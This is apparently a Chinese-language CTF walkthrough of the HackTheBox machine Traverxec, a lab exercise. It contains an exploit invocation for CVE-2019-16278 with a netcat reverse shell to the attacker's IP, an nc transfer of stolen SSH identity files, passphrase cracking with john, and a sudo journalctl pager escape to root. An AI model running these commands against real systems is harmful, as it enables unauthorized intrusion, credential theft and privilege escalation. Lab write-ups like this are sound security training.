基本信息

端口扫描

常规的22,80;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ nmap -sC -sV -Pn 10.10.10.165
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-23 13:43 CST
Nmap scan report for 10.10.10.165
Host is up (0.067s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.09 seconds

80

随意构造报错得到server信息,直接看header也可以,nostromo:

nostromo

这个server有已知漏洞:

www-data shell

服务器有nc,直接reverse shell

1
2
3
python CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "nc -e bash 10.10.14.11 4445"

python -c 'import pty;pty.spawn("/bin/bash")'

信息搜集

因为是nostromo,首先去看下配置文件/var/nostromo/conf/nhttpd.conf,知道www目录,然后去查看相关目录,发现一个压缩包:

1
2
ls -al /home/david/public_www/
ls -al /home/david/public_www/protected-file-area

backup-ssh-identity-files.tgz

1
2
3
4
5
6
7
8
nc -lvvp 4446 > backup.tgz
nc 10.10.14.11 4446 < /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz

$ tar -xvf backup.tgz
x home/david/.ssh/
x home/david/.ssh/authorized_keys
x home/david/.ssh/id_rsa
x home/david/.ssh/id_rsa.pub

拿到了davia用户的ssh私钥,但不能直接使用,需要密码:

ssh passphrase crack

破解出来密码,hunter

1
2
3
4
5
6
7
8
9
10
11
12
13
14
python3 /usr/share/john/ssh2john.py id_rsa > hash.txt

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)
1g 0:00:00:04 DONE (2020-12-10 05:24) 0.2024g/s 2903Kp/s 2903Kc/s 2903KC/sa6_123..*7¡Vamos!
Session completed

nhttpd.conf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# MAIN [MANDATORY]

servername		traverxec.htb
serverlisten		*
serveradmin		david@traverxec.htb
serverroot		/var/nostromo
servermimes		conf/mimes
docroot			/var/nostromo/htdocs
docindex		index.html

# LOGS [OPTIONAL]

logpid			logs/nhttpd.pid

# SETUID [RECOMMENDED]

user			www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess		.htaccess
htpasswd		/var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons			/var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs		/home
homedirs_public		public_www

user flag

然后使用得到的密码登录david,用户目录得到user.txt:

提权信息

bin目录有个server-stats.sh,里面显示可以sudo调用journalctl,直接运行的话可以看出内部应该是用到了less:

利用方式:

server-stats.sh

1
2
3
4
5
6
7
8
9
10
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

提权 & root flag

直接输入!后运行bash,得到root,读取root.txt:

参考资料